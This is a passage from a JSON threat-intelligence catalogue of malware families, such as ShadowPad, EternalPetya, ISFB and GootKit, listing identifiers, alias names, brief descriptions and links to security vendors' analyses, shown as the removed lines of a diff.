"https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] - } - }, - { - "uuid": 
"b662c253-5c87-4ae6-a30e-541db0845f67", - "value": "Vawtrak", - "description": "", - "meta": { - "synonyms": [ - "NeverQuest" - ], - "type": [], - "refs": [ - "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf" - ] - } - }, - { - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" - ] - } - }, - { - "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", - "value": "BadNews", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" - ] - } - }, - { - "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ] - } - }, - { - "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", - "value": "BONDUPDATER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - } - }, - { - "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - } - }, - { - "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", - "value": "Netrepser", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" - ] - } - }, - { - "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", - "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], - "refs": [ - "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] - } - }, - { - "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", - "value": "Pushdo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "http://malware-traffic-analysis.net/2017/04/03/index2.html", - "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" - ] - } - }, - { - "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "", - 
"meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "carberplike", - "downrage" - ], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" - ] - } - }, - { - "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", - "value": "Lady", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/news/?i=10140&lng=en" - ] - } - }, - { - "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", - "value": "Azorult", - "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. 
It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", - "meta": { - "synonyms": [ - "PuffStealer", - "Rultazo" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers" - ] - } - }, - { - "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] - } - }, - { - "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", - "value": "Moose", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", - "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", - "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" - ] - } - }, - { - "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. 
The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] - } - }, - { - "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.riskiq.com/blog/labs/htprat/" - ] - } - }, - { - "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", - "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://orcustechnologies.com/" - ] - } - }, - { - "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", - "value": "Dvmap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" - ] - } - }, - { - "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" - ] - } - }, - { - "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a" - ] - } - }, - { - "uuid": 
"13236f94-802b-4abc-aaa9-cb80cf4df9ed", - "value": "Zloader", - "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.", - "meta": { - "synonyms": [ - "Zeus Terdot" - ], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", - "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" - ] - } - }, - { - "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", - "value": "Unidentified 023", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", - "value": "mozart", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" - ] - } - }, - { - "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", - "value": "DeriaLock", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/812601286088597505" - ] - } - }, - { - "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", - "value": "Korlia", - "description": "", - "meta": { - "synonyms": [ - "bisonal" - ], - "type": [], - "refs": [ - "https://securitykitten.github.io/2014/11/25/curious-korlia.html", - "https://camal.coseinc.com/publish/2013Bisonal.pdf" - ] - } - }, - { - "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", - "value": "TeleRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] - } - }, - { - "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "", - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] - } - }, - { - "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", - "value": "KillDisk", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" - ] - } - }, - { - "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", - "value": "Laziok", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", - "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" - ] - } - }, - { - "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", - "value": "BS2005", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] - } - }, - { - "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "", - "meta": { - "synonyms": [ - "NonPetya", - "Diskcoder.C", - "NotPetya", - "Petna", - "Nyetya", - "BadRabbit", - "nPetya", - "ExPetr", - "Pnyetya" - ], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - 
"https://securelist.com/from-blackenergy-to-expetr/78937/",
- "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
- "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/",
- "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
- "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
- "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
- "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
- "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
- "http://www.intezer.com/notpetya-returns-bad-rabbit/",
- "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
- "https://www.riskiq.com/blog/labs/badrabbit/",
- "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/",
- "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
- "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
- "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
- "https://securelist.com/schroedingers-petya/78870/",
- "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
- 
"https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
- "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
- "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
- "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
- "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
- "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
- "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
- "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
- "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
- "https://securelist.com/bad-rabbit-ransomware/82851/"
- ]
- }
- },
- {
- "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
- "value": "DarkComet",
- "description": "",
- "meta": {
- "synonyms": [
- "Fynloski",
- "klovbot"
- ],
- "type": [],
- "refs": [
- "https://darkcomet.net",
- "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
- "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/"
- ]
- }
- },
- {
- "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d",
- "value": "ISFB",
- "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll 
version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. 
The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.",
- "meta": {
- "synonyms": [
- "Gozi ISFB",
- "IAP",
- "Pandemyia"
- ],
- "type": [],
- "refs": [
- "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
- "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
- "https://lokalhost.pl/gozi_tree.txt",
- "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
- "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
- "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
- "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html"
- ]
- }
- },
- {
- "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859",
- "value": "CMSBrute",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/the-shade-encryptor-a-double-threat/72087/"
- ]
- }
- },
- {
- "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac",
- "value": "Listrix",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
- ]
- }
- },
- {
- "uuid": "4c786624-4a55-46e6-849d-b65552034235",
- "value": "Miuref",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c",
- "value": "Ransomlock",
- "description": "",
- "meta": {
- "synonyms": [
- "WinLock"
- ],
- "type": [],
- "refs": [
- 
"https://forum.malekal.com/viewtopic.php?t=36485&start=",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2"
- ]
- }
- },
- {
- "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154",
- "value": "pirpi",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
- ]
- }
- },
- {
- "uuid": "4cb8235a-7e70-4fad-9244-69215750d559",
- "value": "Unidentified 045",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
- "value": "WireX",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
- "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/"
- ]
- }
- },
- {
- "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532",
- "value": "Slave",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/"
- ]
- }
- },
- {
- "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
- "value": "TinyZ",
- "description": "",
- "meta": {
- "synonyms": [
- "Catelites Android Bot",
- "MarsElite Android Bot"
- ],
- "type": [],
- "refs": [
- "http://blog.group-ib.com/cron"
- ]
- }
- },
- {
- "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
- "value": "RGDoor",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
- ]
- }
- },
- {
- "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310",
- "value": "Citadel",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- 
"refs": [
- "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
- "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
- "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
- "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/"
- ]
- }
- },
- {
- "uuid": "9a3d71b1-ce2f-4506-85c1-ec661b8f4032",
- "value": "DualToy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
- ]
- }
- },
- {
- "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
- "value": "Magala",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/"
- ]
- }
- },
- {
- "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74",
- "value": "X-Tunnel",
- "description": "",
- "meta": {
- "synonyms": [
- "xaps"
- ],
- "type": [],
- "refs": [
- "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
- "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
- "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf",
- "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf"
- ]
- }
- },
- {
- "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375",
- "value": "OvidiyStealer",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses"
- ]
- }
- },
- {
- "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb",
- "value": "Trump Ransom",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "34e9d701-22a1-4315-891d-443edd077abf",
- "value": "SpyBot",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f",
- "value": "CockBlocker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/JaromirHorejsi/status/817311664391524352"
- ]
- }
- },
- {
- "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a",
- "value": "Cryptorium",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/struppigel/status/810770490491043840"
- ]
- }
- },
- {
- "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70",
- "value": "Ayegent",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "5b3af4f0-7502-4125-bf63-b393cf185a52",
- "value": "FlexiSpy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
- ]
- }
- },
- {
- "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d",
- "value": "PLEAD",
- "description": "",
- "meta": {
- "synonyms": [
- "TSCookie"
- ],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
- "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
- "http://www.freebuf.com/column/159865.html",
- "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
- "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf"
- ]
- }
- },
- 
{
- "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a",
- "value": "Sality",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
- ]
- }
- },
- {
- "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753",
- "value": "GootKit",
- "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.",
- "meta": {
- "synonyms": [
- "Xswkit"
- ],
- "type": [],
- "refs": [
- "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669",
- "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
- "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
- "https://www.us-cert.gov/ncas/alerts/TA16-336A",
- "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
- "https://www.youtube.com/watch?v=242Tn0IL2jE",
- "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
- "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/",
- "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
- "https://news.drweb.com/show/?i=4338&lng=en",
- "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/",
- "https://www.youtube.com/watch?v=QgUlPvEE4aw",
- "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055"
- ]
- }
- },
- {
- "uuid": "294bb6f0-0610-47e6-a4e7-71e40cf69908",
- "value": "Cpuminer",
- "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.",
- "meta": {
- 
"synonyms": [],
- "type": [],
- "refs": [
- "https://github.com/pooler/cpuminer"
- ]
- }
- },
- {
- "uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
- "value": "Ripper ATM",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/"
- ]
- }
- },
- {
- "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02",
- "value": "MacInstaller",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://objective-see.com/blog/blog_0x16.html"
- ]
- }
- },
- {
- "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b",
- "value": "Chapro",
